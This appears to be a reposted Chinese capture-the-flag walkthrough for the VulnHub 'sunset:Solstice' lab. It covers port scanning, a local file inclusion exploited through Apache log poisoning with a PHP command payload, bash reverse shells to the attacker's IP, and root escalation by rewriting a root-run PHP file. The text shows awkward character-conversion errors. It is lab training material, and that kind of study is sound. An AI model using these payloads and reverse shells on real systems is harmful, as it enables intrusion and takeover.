sunset:Solstice
https://www.vulnhub.com/entry/sunset-solstice,499/
1,将两台捏造机网络毗连都改为NAT模式
2,攻击机上做namp局域网扫描发现靶机
nmap -sn 192.168.23.0/24
那么攻击机IP为192.168.23.182,靶场IP192.168.23.244
3,对靶机举行端口服务探测
nmap -sV -T4 -p- -A 192.168.23.244
1. FTP服务分析(21/tcp, 2121/tcp, 62524/tcp)
pyftpdlib 1.5.6 (21/tcp, 2121/tcp):
- 匿名登录答应(2121端口):实行登录 ftp://192.168.23.244:2121 用户名为 anonymous,空暗码。
- 检查 pub 目次:ls -al 检察权限和文件。若可写,可上传反向Shell或测试文件。
- 搜刮弊端:pyftpdlib 1.5.6 是否存在已知弊端(如CVE-2021-30800)。
FreeFloat ftpd 1.00 (62524/tcp):
- 旧版本,大概存在缓冲区溢出弊端(如CVE-2010-4221)。利用 searchsploit freefloat 查找EXP。
2. SSH服务分析(22/tcp)
OpenSSH 7.9p1:
- 检查版本是否有已知弊端(如CVE-2021-41617),但该版本较新,大概已修复。
- 若获取根据,可实行登录。或通过其他服务(如FTP/SMB)泄漏的根据举行爆破。
3. SMTP服务分析(25/tcp)
Exim smtpd:
- 利用 smtp-user-enum 或手动下令罗列用户:
telnet 192.168.23.244 25
VRFY root # 测试是否存在用户
- 检查CVE-2019-15846(Exim 4.92.1以下长途代码实行),但需确认版本是否受影响。
4. HTTP服务分析(80/tcp, 8593/tcp, 54787/tcp)
Apache 2.4.38 (80/tcp):
- 访问 http://192.168.23.244,检查页面内容。
- 利用目次罗列工具:
gobuster dir -u http://192.168.23.244 -w /usr/share/wordlists/dirbuster/common.txt
PHP cli服务器 (8593/tcp, 54787/tcp):
- 访问 http://192.168.23.244:8593 和 http://192.168.23.244:54787,检查应勤奋能。
- 检查PHP版本弊端(7.3.14),如反序列化、文件包罗(?page=../../etc/passwd)。
5. SMB服务分析(139/tcp, 445/tcp)
Samba 4.9.5-Debian:
- 罗列共享和用户:
smbclient -L 192.168.23.244 -N
enum4linux -a 192.168.23.244
- 检查匿名访问共享:
smbclient \\\\192.168.23.244\\[sharename] -N
- 测试CVE-2017-7494(Samba长途代码实行),但需设置答应写入共享。
6. Squid署理分析(3128/tcp)
Squid 4.6:
- 测试署理是否开放:
curl -x http://192.168.23.244:3128 Example Domain
- 若可用,用于扫描内网或访问受限资源。
4,21端口的ftp服务器登录失败,登录2121端口的ftp服务器乐成
ftp 192.168.23.244
ftp 192.168.23.244 2121
再看看web服务的几个端口
http://192.168.23.244/
http://192.168.23.244:8593/
http://192.168.23.244:54787/
5,经过测试这个网站存在本地文件包罗弊端
http://192.168.23.244:8593/index.php?book=../../../../../../etc/passwd
那么就必要把这个本地文件包罗弊端利用起来,然后getshell。恰恰可以或许包罗
http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log
利用nc污染日志
echo -e "GET / HTTP/1.1\r\nHost: 192.168.23.244\r\nUser-Agent: <?php system(\$_GET['cmd']); ?>\r\nConnection: close\r\n\r\n" | nc 192.168.23.244 80
访问文件包罗网页确定弊端是否利用乐成
http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log&cmd=id
弊端利用乐成,乐成实行了体系下令,接下来构造下令反弹shell(必要URL编码)
bash -c 'exec bash -i &>/dev/tcp/192.168.23.182/4444 <&1'
http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log&cmd=bash%20-c%20%27exec%20bash%20-i%20%26%3E/dev/tcp/192.168.23.182/4444%20%3C%261%27%0A
利用kali接收来自靶机的shell
6,信息收集一下
uname -a
cat /etc/*-release
getconf LONG_BIT
搜刮一下root用户可读可写的可实行文件
find / -type f -user root -perm -o=w 2>/dev/null | grep -v "/sys/" | grep -v "/proc/"
检察一下这个文件
cat /var/tmp/sv/index.php
检察一下进程
ps -ef | grep "/var/tmp/sv"
发现有一个进程利用php解释器实行/var/tmp/sv,利用ehco写入木马构造恶意php文件
echo "<?php" > /var/tmp/sv/index.php && echo "echo \"Under construction\";" >> /var/tmp/sv/index.php && echo "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.23.182/8888 0>&1'\");" >> /var/tmp/sv/index.php && echo "?>" >> /var/tmp/sv/index.php
cat /var/tmp/sv/index.php
靶机上通过nc访问运行这个进程的57端口,并哀求/index.php文件
cd /tmp
curl localhost:57
然后kali开启对8888端口的监听
nc -lvvp 8888
乐成提权成为root用户,拿到flag
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
|
发表于 2025-9-12 18:01:59
